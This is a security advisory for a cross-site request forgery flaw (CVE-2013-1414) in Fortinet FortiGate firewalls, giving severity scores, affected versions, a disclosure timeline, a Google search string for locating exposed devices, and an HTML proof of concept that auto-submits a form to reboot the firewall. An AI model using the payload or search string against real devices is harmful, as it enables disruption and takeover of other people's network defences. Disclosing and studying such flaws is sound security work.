5.1 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
HIGH
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:H/Au:N/C:P/I:P/A:P
6.9 Medium
AI Score
Confidence
Low
0.002 Low
EPSS
Percentile
52.3%
Vulnerability ID: CVE-2013-1414
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Product: All Fortigate Firewalls
Vendor: Fortinet http://www.fortinet.com
Vulnerable Version: < 4.3.13 & < 5.0.2
Description
==========
Because many functions are not protected by CSRF-Tokens, it's possible (under certain conditions) to modify System-Settings, Firewall-Policies or take control over the hole firewall.
Requirements
===========
An Attacker needs to know the IP of the device.
An Administrator needs an authenticated connection to the device.
Report-Timeline:
================
Vendor Notification: 11 July 2012
Vendor released version 5.0.2 / 18 March 2013
Vendor released version 4.3.13 / 29 April 2013
Status: Fixed
Google Dork:
==========
-english -help -printing -companies -archive -wizard -pastebin -adult -keywords "Warning: this page requires Javascript. To correctly view, please enable it in your browser"
Credit:
=====
Sven Wurth [email protected]
PoC
====
This Example will reboot a Fortinet Firewall.
This is just one of many possibilities to attack this vulnerability.
##### CSRF - Proof Of Concept ####
<html>
<body onload="submitForm()">
<form name="myForm" id="myForm"
action="https://###_VICTIM_IP_###/system/maintenance/shutdown" method="post">
<input type="hidden" name="reason" value="">
<input type="hidden" name="action" value="1">
<input type="submit" name="add" value="rebootme">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>
##### End Poc #####